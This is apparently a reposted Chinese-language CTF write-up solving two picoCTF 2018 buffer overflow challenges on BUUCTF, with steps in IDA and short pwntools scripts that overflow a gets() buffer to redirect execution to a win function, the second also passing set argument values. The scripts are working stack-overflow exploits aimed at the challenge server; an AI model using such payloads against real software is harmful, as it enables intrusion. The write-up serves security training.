zoukankan      html  css  js  c++  java
  • [BUUCTF]PWN——picoctf_2018_buffer overflow 1/2

    picoctf_2018_buffer overflow 1

    附件

    步骤:

    1. 例行检查,32位程序,没开保护
      在这里插入图片描述
    2. 本地运行一下程序,看看程序大概的执行情况
      在这里插入图片描述
    3. 32位ida载入,习惯性的检查程序里的字符串,发现有flag.txt,跟进,找到了读出flag的函数,win_addr=0x80485CB
      在这里插入图片描述
    4. 根据运行时看到的字符串找到了输入点
      在这里插入图片描述
      gets函数读入,存在溢出漏洞,覆盖ret为win函数即可
    from pwn import *
    
    r=remote('node3.buuoj.cn',27200)
    win_addr=0x80485CB
    
    payload='a'*(0x28+4)+p32(win_addr)
    
    r.sendline(payload)
    r.interactive()
    

    在这里插入图片描述

    picoctf_2018_buffer overflow 2

    附件

    步骤

    1. 例行检查,32位程序,开启了NX保护
      在这里插入图片描述
    2. 本地试运行一下程序,看看大概的情况
      在这里插入图片描述
    3. 32位ida载入,习惯性的检索字符串,看到了flag.txt,双击跟进
      在这里插入图片描述
      跟1差不多,2只是调用win函数的时候要满足a1=0xDEADBEEF,a2=0xDEADC0DE,就可以读出flag了
    from pwn import*
    r=remote('node3.buuoj.cn',25010)
    payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
    r.sendline(payload)
    r.interactive()
    

    在这里插入图片描述

  • 相关阅读:
    简单批处理语法结构
    简单批处理常用命令
    简单批处理符号简介
    简单批处理内部命令
    jQuery操作DOM
    jQuery中的事件与动画
    jQuery选择器
    初始面向对象
    初识jQuery
    操作DOM
  • 原文地址:https://www.cnblogs.com/xlrp/p/14273670.html
Copyright © 2011-2022 走看看